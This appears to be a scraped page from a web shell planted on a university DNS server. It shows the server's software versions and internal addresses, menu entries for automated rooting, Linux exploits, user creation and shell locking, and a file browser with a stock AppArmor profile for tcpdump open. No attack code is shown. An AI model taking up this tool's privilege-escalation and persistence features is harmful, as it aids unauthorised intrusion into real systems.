Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
etc /
apparmor.d /
[ HOME SHELL ]
Name
Size
Permission
Action
abi
[ DIR ]
drwxr-xr-x
abstractions
[ DIR ]
drwxr-xr-x
disable
[ DIR ]
drwxr-xr-x
force-complain
[ DIR ]
drwxr-xr-x
local
[ DIR ]
drwxr-xr-x
tunables
[ DIR ]
drwxr-xr-x
lsb_release
1.31
KB
-rw-r--r--
nvidia_modprobe
1.16
KB
-rw-r--r--
sbin.dhclient
3.42
KB
-rw-r--r--
ubuntu_pro_apt_news
1.8
KB
-rw-r--r--
ubuntu_pro_esm_cache
6.71
KB
-rw-r--r--
usr.bin.evince
11.23
KB
-rw-r--r--
usr.bin.man
3.37
KB
-rw-r--r--
usr.bin.tcpdump
1.65
KB
-rw-r--r--
usr.lib.libreoffice.program.oosplash
1.48
KB
-rw-r--r--
usr.lib.libreoffice.program.senddoc
1.2
KB
-rw-r--r--
usr.lib.libreoffice.program.soffice.bin
10.49
KB
-rw-r--r--
usr.lib.libreoffice.program.xpdfimport
1.02
KB
-rw-r--r--
usr.lib.snapd.snap-confine.real
31.04
KB
-rw-r--r--
usr.sbin.cups-browsed
677
B
-rw-r--r--
usr.sbin.cupsd
6
KB
-rw-r--r--
usr.sbin.named
2.43
KB
-rw-r--r--
usr.sbin.rsyslogd
1.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : usr.bin.tcpdump
# vim:syntax=apparmor #include <tunables/global> profile tcpdump /usr/bin/tcpdump { #include <abstractions/base> #include <abstractions/nameservice> #include <abstractions/user-tmp> capability net_raw, capability setuid, capability setgid, capability dac_override, capability chown, network raw, network packet, # for -D @{PROC}/bus/usb/ r, @{PROC}/bus/usb/** r, # for finding an interface /dev/ r, @{PROC}/[0-9]*/net/dev r, /sys/bus/usb/devices/ r, /sys/class/net/ r, /sys/devices/**/net/** r, # for -j capability net_admin, # for tracing USB bus, which libpcap supports /dev/usbmon* r, /dev/bus/usb/ r, /dev/bus/usb/** r, # for init_etherarray(), with -e /etc/ethers r, # for USB probing (see libpcap-1.1.x/pcap-usb-linux.c:probe_devices()) /dev/bus/usb/**/[0-9]* w, # for -z /{usr/,}bin/gzip ixr, /{usr/,}bin/bzip2 ixr, # for -F and -w audit deny @{HOME}/.* mrwkl, audit deny @{HOME}/.*/ rw, audit deny @{HOME}/.*/** mrwkl, audit deny @{HOME}/bin/ rw, audit deny @{HOME}/bin/** mrwkl, owner @{HOME}/ r, owner @{HOME}/** rw, # for -r, -F and -w /**.[pP][cC][aA][pP] rw, /**.[pP][cC][aA][pP][nN][gG] rw, /**.[cC][aA][pP] rw, # -W adds a numerical suffix /**.[pP][cC][aA][pP][0-9]* rw, /**.[pP][cC][aA][pP][nN][gG][0-9]* rw, /**.[cC][aA][pP][0-9]* rw, # for convenience with -r (ie, read pcap files from other sources) /var/log/snort/*log* r, /usr/bin/tcpdump mr, # allow printing to stdout/stderr when inside a container # (LP: #1667016) /dev/pts/* rw, # Site-specific additions and overrides. See local/README for details. #include <local/usr.bin.tcpdump> }
Close